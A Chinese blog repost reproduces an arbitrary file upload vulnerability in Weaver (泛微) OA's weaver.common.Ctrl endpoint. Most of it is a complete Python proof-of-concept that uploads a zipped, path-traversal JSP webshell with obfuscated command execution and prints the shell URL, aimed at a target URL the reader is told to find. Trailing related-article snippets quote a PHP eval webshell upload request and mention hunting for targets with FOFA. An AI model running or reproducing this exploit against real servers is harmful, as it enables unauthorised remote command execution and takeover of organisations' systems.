泛微OA 任意文件上传漏洞

最新推荐文章于 2024-10-01 15:20:30 发布
最新推荐文章于 2024-10-01 15:20:30 发布
阅读量7.5k 收藏 7
点赞数 1
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: 安全 web安全
原文链接:https://mp.weixin.qq.com/s/WoWIZzY48C6GjCrbgnSErg
版权
本文详细介绍了泛微OA系统weaver.common.Ctrl组件存在的任意文件上传漏洞,攻击者可借此上传webshell,控制服务器。复现步骤包括定位漏洞路径并使用POC进行文件上传。此外,提供了Python脚本实现文件上传过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用需知

由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。
本文来源于PeiQi文库 ,作者PeiQi文库

一、漏洞描述

泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器

二、漏洞影响

泛微OA

三、漏洞复现

存在漏洞的路径为

/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

使用POC进行文件上传

python poc.py

在这里插入图片描述

四、漏洞POC

import zipfile
import random
import sys
import requests



def generate_random_str(randomlength=16):
    random_str = ''
    base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
    length = len(base_str) - 1
    for i in range(randomlength):
        random_str += base_str[random.randint(0, length)]
    return random_str

mm = generate_random_str(8)

webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1

def file_zip():
    shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
    if(request.getParameter("cmd")!=null){
        BASE64Decoder decoder = new BASE64Decoder();
        Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
        Process e = (Process)
                rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                        String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                        Object[]{}), request.getParameter("cmd") );
        java.io.InputStream in = e.getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
    """   ## 替换shell内容
    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
    zf.writestr(webshell_name2, shell)

def GetShell(urllist):
    file_zip()
    # print('上传文件中')
    urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
    file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
    try:
        requests.post(url=urls,files=file,timeout=60, verify=False)
        GetShellurl = urllist+'/cloudstore/'+webshell_name1
        GetShelllist = requests.get(url = GetShellurl)
        if GetShelllist.status_code == 200:
            print(GetShellurl+"?cmd=whoami")
    except:
        pass

GetShell("自己找的漏洞URL")
漏洞复现】CERIO DT系列路由器 远程代码执行漏洞
qq_67810151的博客
03-13 618
CERIO DT系列路由器在特定版本中存在操作命令注入漏洞。未授权的攻击者可利用该漏洞进行远程代码执行,从而控制服务器。
通达OA v11.9 appbuilder任意命令执行漏洞
ZeroDay001的博客
02-22 143
通达OA v11.9 appbuilder任意命令执行漏洞这是一个集内容管理与发布于一体的智能平台,广服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
OA weaver.common.Ctrl 任意文件上传漏洞
DUANYU23的博客
05-17 4235
poc import zipfile import random import sys import requests def generate_random_str(randomlength=16): random_str = '' base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' length = len(base_str) - 1 for i in range(randomlen
【严重】 e-cology <10.58.3 任意文件上传漏洞
murphysec的博客
08-04 1272
OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业信机器人获取一手的情报。 e-cology 10.58.3之前版本存在任意文件上传漏洞,由于上传接口身份认证缺失,未经过身份验证的攻击者可以构造恶意请求将文件上传至服务器,攻击者可能通过上传jsp文件,从而远程执行任意命令。协同管理应用平台(e-cology)是一套企业大型协同管理平台。
OA e-office平台uploadify.php任意文件上传漏洞
薛定谔嘚喵博客
10-07 1094
e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。 OA e-office平台uploadify.php处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
漏洞复现】 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
李火火的安全圈
11-29 5503
0x01 漏洞概述 e-office是旗下的一款标准的协同移动办公平台。 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。 0x02 影响范围 e-office V9.0 0x03 漏洞复现 访问界面如下 ...
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Silentsoul04#vulnerability-paper-1#OA9前台任意文件上传1
07-25
OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
漏洞复现】OA e-office webservice 任意文件上传漏洞
qq_67810151的博客
04-25 1085
e-office /webservice/upload/upload.php接口存在任意文件上传漏洞。未收取的攻击者可以通过该漏洞上传恶意脚本文件,从而控制服务器。
漏洞复现】OA E-Office do_excel.php 任意文件写入漏洞
qq_48368964的博客
10-01 1543
OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。0-0fice是一款标准化的协同 OA办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
突破防线!OA任意文件上传Getshell
如果巅峰留不住,那就重走来时路
08-16 896
子曰:“巧言令色,鲜矣仁。”
OA E-Office V10 OfficeServer 任意文件上传漏洞复现
故事讲予风听
10-20 3593
e-ofice是一款标准化的协同0A办公软件, E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等。
e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
Ms08067安全实验室
12-14 6252
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...
[漏洞挖掘]SRC-OA文件上传
wwxxee
05-19 4308
SRC–OA任意文件上传 OA weaver.common.Ctrl 任意文件上传漏洞 存在漏洞的路径为: /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp 首页: 请求包: FOFA: app=“-协同办公OA” && is_domain=true 普通注册会员只能获取5页信息。 有FOFA会员可以直接通过API请求拿到I
OA_lang2sql 任意文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-06 1024
OA E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
二次开发 文件上传
weixin_48973977的博客
05-10 585
上述代码中 setFilecontent部分是设置文件的base64编码值 注(不需要解码再放进去 源码中有做解码操作!
【工具】通达漏洞综合利用工具v1.0
Wulai399的博客
06-06 715
通达漏洞综合利用工具v1.0
OAwebservice接口附件上传
StrivingSRC的博客
03-26 2207
requestName>工单升级</requestName>
oa文件上传漏洞
最新发布
03-14
<think>好的,我现在需要处理用户关于OA文件上传漏洞的查询。用户想了解漏洞的详情及修复方法。首先,我需要整理用户提供的引用内容,这些引用提到了三个不同的漏洞:do_excel.php、init.php和upload.php的任意文件上传漏洞。 首先,我需要确认每个漏洞的具体路径和影响。根据引用[1],do_excel.php接口未校验上传文件的路径和名称,导致攻击者可写入恶意文件。引用[2]提到的是/E-mobile/App/init.php,同样存在上传漏洞。引用[3]则指出三个不同的upload.php路径存在漏洞。这些漏洞的共同点是允许攻击者上传恶意文件,可能导致服务器被控制。 接下来,用户可能想知道漏洞的利用方式。根据描述,攻击者构造特定请求上传WebShell等文件,从而执行命令。需要说明这些漏洞的严重性,比如数据泄露、权限提升等后果。 然后是修复方案。通常这类漏洞的修复涉及对上传文件的有效校验,比如限制文件类型、检查文件名和路径、设置权限等。可能需要建议用户升级到最新版本,或应用官方补丁。同时,加强服务器安全配置,如禁用不必要的服务,定期安全审计。 用户可能还希望了解如何检测是否存在这些漏洞,比如使用网络空间测绘工具如Fofa搜索app="-EOffice",但要注意合法授权。此外,生成的相关问题需要覆盖漏洞分析、利用实例和防护措施,以帮助用户全面理解。 最后,确保回答结构清晰,分点说明漏洞详情、利用方式和修复方法,并附上相关问题供用户进一步探索。同时,正确引用提供的参考资料,确保信息准确可靠。</think>### OA文件上传漏洞详情及修复方法 #### 一、漏洞详情 OA系统中存在多个文件上传漏洞,主要由于未对上传文件的路径、名称或类型进行有效校验,导致攻击者可上传恶意文件。以下是已知漏洞的详细信息: 1. **do_excel.php任意文件写入漏洞** - **路径**: `/do_excel.php` - **描述**: 该接口未限制上传文件的路径和文件名,攻击者可构造请求将恶意文件(如WebShell)写入服务器指定位置,从而执行任意命令或窃取数据[^1]。 - **影响**: 服务器控制权丢失、数据泄露、业务瘫痪。 2. **/E-mobile/App/init.php任意文件上传漏洞** - **路径**: `/E-mobile/App/init.php` - **描述**: 攻击者通过上传恶意文件可直接获取服务器控制权,执行系统命令或部署后门程序[^2]。 - **影响**: 服务器完全被接管,系统安全性彻底破坏。 3. **多路径upload.php任意文件上传漏洞** - **路径**: - `/webservice/upload/upload.php` - `/webservice-json/upload/upload.php` - `/webservice-xml/upload/upload.php` - **描述**: 三个接口均未对上传文件进行安全校验,攻击者可上传任意类型文件(如`.php`、`.jsp`),实现远程代码执行[^3]。 - **影响**: 系统权限提升、敏感数据泄露。 --- #### 二、漏洞利用方式 攻击者通过以下步骤利用漏洞: 1. **构造恶意请求**: 使用工具(如Burp Suite)修改HTTP请求,绕过前端校验。 2. **上传WebShell**: 将包含恶意代码的文件(如`shell.php`)上传至服务器。 3. **执行命令**: 通过访问上传WebShell路径,触发恶意代码执行,获取系统权限。 例如,攻击者可能通过以下Payload上传文件: ```http POST /webservice/upload/upload.php HTTP/1.1 ... Content-Disposition: form-data; name="file"; filename="shell.php" <?php @eval($_POST['cmd']);?> ``` --- #### 三、修复方案 1. **官方补丁升级** - 联系官方获取最新版本或安全补丁,修复已知漏洞- 重点关注`do_excel.php`、`init.php`及`upload.php`等接口的更新说明。 2. **代码层修复** - **文件类型白名单**: 限制上传文件扩展名(如仅允许`.docx`、`.xlsx`)。 - **路径隔离**: 将上传目录设置为不可执行(通过`.htaccess`或Nginx配置)。 - **文件名随机化**: 对上传文件重命名,避免路径遍历攻击。 3. **服务器加固** - 禁用不必要的PHP函数(如`eval()`、`system()`)。 - 定期清理`/upload/`目录下的非业务相关文件。 - 配置Web应用防火墙(WAF),拦截恶意上传请求。 4. **安全监测** - 使用漏洞扫描工具(如Nessus)定期检测系统漏洞- 监控服务器日志,排查异常文件上传行为。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值